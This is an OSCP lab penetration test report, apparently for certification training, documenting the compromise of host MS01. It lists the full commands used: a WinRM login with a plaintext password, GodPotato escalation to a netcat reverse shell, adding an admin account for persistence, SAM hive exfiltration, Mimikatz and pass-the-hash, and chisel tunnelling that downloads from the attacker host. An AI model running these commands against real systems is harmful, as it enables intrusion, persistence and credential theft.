Scribd
Upload
120 views10 pages

lab-report

hngghh

Uploaded by

leighlinr
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
120 views10 pages

lab-report

hngghh

Uploaded by

leighlinr
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 10

Offensive Security

OSCP A Report

OSID: 57195594
leighlinr@gmail.com

September 25, 2025

v1.0

CONFIDENTIAL 1
Table of Contents
1 Offensive Security OSCP Lab Penetration Test Report ............ 3
1.1 Objective .......................................................................................................... 3
1.2 Lab Network .................................................................................................... 3
1.3 Identified Vulnerabilities ............................................................................... 3

2 Lab Network ................................................................................. 4


2.1 MS01.OSCP.EXAM (192.168.230.141) ............................................................... 4
2.1.1 Initial Access .............................................................................................................................. 4
2.1.2 Privilege Escalation .................................................................................................................. 4
2.1.3 Post-Exploitation ...................................................................................................................... 5

CONFIDENTIAL OSCP A Report 2


1 Offensive Security OSCP Lab Penetration Test
Report
1.1 Objective
Leighlin Ramsay (57195594) was tasked with performing an internal penetration test towards
Offensive Security Labs. An internal penetration test is a dedicated attack against internally connected
systems. The focus of this test is to perform attacks, similar to those of a hacker and attempt to
infiltrate Offensive Security’s internal lab systems – the oscp.exam domain. Leighlin Ramsay’s
(57195594) overall objective was to evaluate the network, identify systems, and exploit flaws while
reporting the findings back to Offensive Security.

When performing the internal penetration test, there were several alarming vulnerabilities that were
identified on Offensive Security’s network. When performing the attacks, Leighlin Ramsay (57195594)
was able to gain access to multiple machines, primarily due to outdated patches and poor security
configurations. During the testing, Leighlin Ramsay (57195594) had administrative level access to
multiple systems. All systems were successfully exploited and access granted.

1.2 Lab Network


Offensive Security Complete Guide machines (alpha and beta) may not be included in your lab report,
they are for demonstration purposes only.

For more information regarding the Bonus Points requirements, please visit the following URL: https://
help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide

1.3 Identified Vulnerabilities


In the course of this penetration test 1 Critical vulnerabilities were identified:

Target Name IP CVSS Page

MS01.OSCP.EXAM 192.168.230.141 9.9 4

CONFIDENTIAL OSCP A Report 3


2 Lab Network
2.1 MS01.OSCP.EXAM (192.168.230.141)

Score: 9.9 (Critical)

Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

2.1.1 Initial Access

MS01 — Initial Access


The initial foothold on MS01 was obtained by authenticating to Windows Remote Management
(WinRM) using valid user credentials for eric.wallows. With WinRM reachable from the assessment
host, a direct nxc winrm invocation established an interactive session as the target user, confirming
access without requiring exploit code. This method was chosen because it is reliable, low-noise, and
immediately yields a stable command channel suitable for subsequent local enumeration and post-
exploitation tasks.

Command(s) Executed

nxc winrm 192.168.230.141 -u eric.wallows -p 'EricLikesRunning800'

2.1.2 Privilege Escalation

MS01 — Privilege Escalation


After landing as eric.wallows, local privilege review showed the account possessed
SeImpersonatePrivilege, which enables token impersonation attacks in Windows service contexts. To
escalate, I executed GodPotato (NET4) to trigger an impersonation chain and spawn a SYSTEM
reverse shell via nc64.exe . The approach was selected because GodPotato is a practical, well-
understood method for converting SeImpersonatePrivilege into full administrative control when the
RPC endpoints and service configuration permit it. The reverse shell was caught on a controlled
listener, and a quick identity check (e.g., whoami ) validated elevation to NT AUTHORITY\SYSTEM.

Exploit Steps

.\GodPotato-NET4.exe -cmd "C:\Users\eric.wallows\videos\nc64.exe 192.168.45.225 443 -e


cmd.exe"

CONFIDENTIAL OSCP A Report 4


# Attacker side:
nc -lvnp 443

To preserve access during the testing window, I briefly added a local administrator account and placed
it into both Administrators and Remote Management Users. (If persistence is out of scope, omit
these steps and document the rationale; shown here strictly as captured activity.)

(Optional) Persistence

net user svc pwn123456$ /add


net localgroup "Administrators" svc /add
net localgroup "Remote Management Users" svc /add

2.1.3 Post-Exploitation

MS01 — Post-Exploitation
With SYSTEM-level control, I collected ofÒine credential material by saving the SAM and SYSTEM
registry hives and exfiltrating them for analysis. This enables hash extraction without leaving

CONFIDENTIAL OSCP A Report 5


additional tooling resident on the target. The hives were then parsed with Impacket’s secretsdump.py
to recover local account hashes for later validation and potential lateral movement.

Hive Collection & Parsing

.\GodPotato-NET4.exe -cmd "reg save HKLM\SAM C:\Users\eric.wallows\videos\sam"


.\GodPotato-NET4.exe -cmd "reg save HKLM\SYSTEM C:\Users\eric.wallows\videos\system"
# Exfiltrate:
download sam
download system
# Offline parse:
python3 secretsdump.py -sam sam -system system LOCAL

To validate administrative reach, I used a recovered Administrator hash with PsExec to obtain a
remote administrative shell against MS01 using the hostname. This confirmed that credential material
extracted from the host was functional for remote management interfaces.

Admin Reach Validation

python3 psexec.py "MS01/Administrator"@"ms01.oscp.exam" -debug -hashes ":HASHES"

CONFIDENTIAL OSCP A Report 6


For additional secrets, I ran Mimikatz in the elevated session to enumerate LSA secrets and
interactive logon credentials. During this step, a credential artifact for celia.almeda was observed in
sekurlsa::logonpasswords . This report intentionally does not include any activity that depends on
using that hash in the AD environment, as the cutoff is before the sentence “Celia.almeda’s hash works
in the AD network.”

Memory/Secrets Collection

.\mimikatz.exe
lsadump::secrets
sekurlsa::logonpasswords

CONFIDENTIAL OSCP A Report 7


I also prepared infrastructure for potential pivoting by staging a simple HTTP server and a chisel
reverse SOCKS5 endpoint on the attacker machine. This enables on-demand tunnel establishment
from the target toward the tester, without requiring inbound firewall changes on the internal network.
(Only preparation is documented here; client-side pivot steps and any AD use of credentials are
outside the permitted scope for this section.)

Pivot Prep (Staging)

python3 -m http.server 80
chisel server -p 7000 --reverse --socks5

curl http://192.168.45.225/chisel.exe -o c.exe


.\c.exe client 192.168.45.225:7000 R:socks

CONFIDENTIAL OSCP A Report 8


CONFIDENTIAL OSCP A Report 9
End of Report

This report was rendered


by SysReptor with

CONFIDENTIAL OSCP A Report 10

You might also like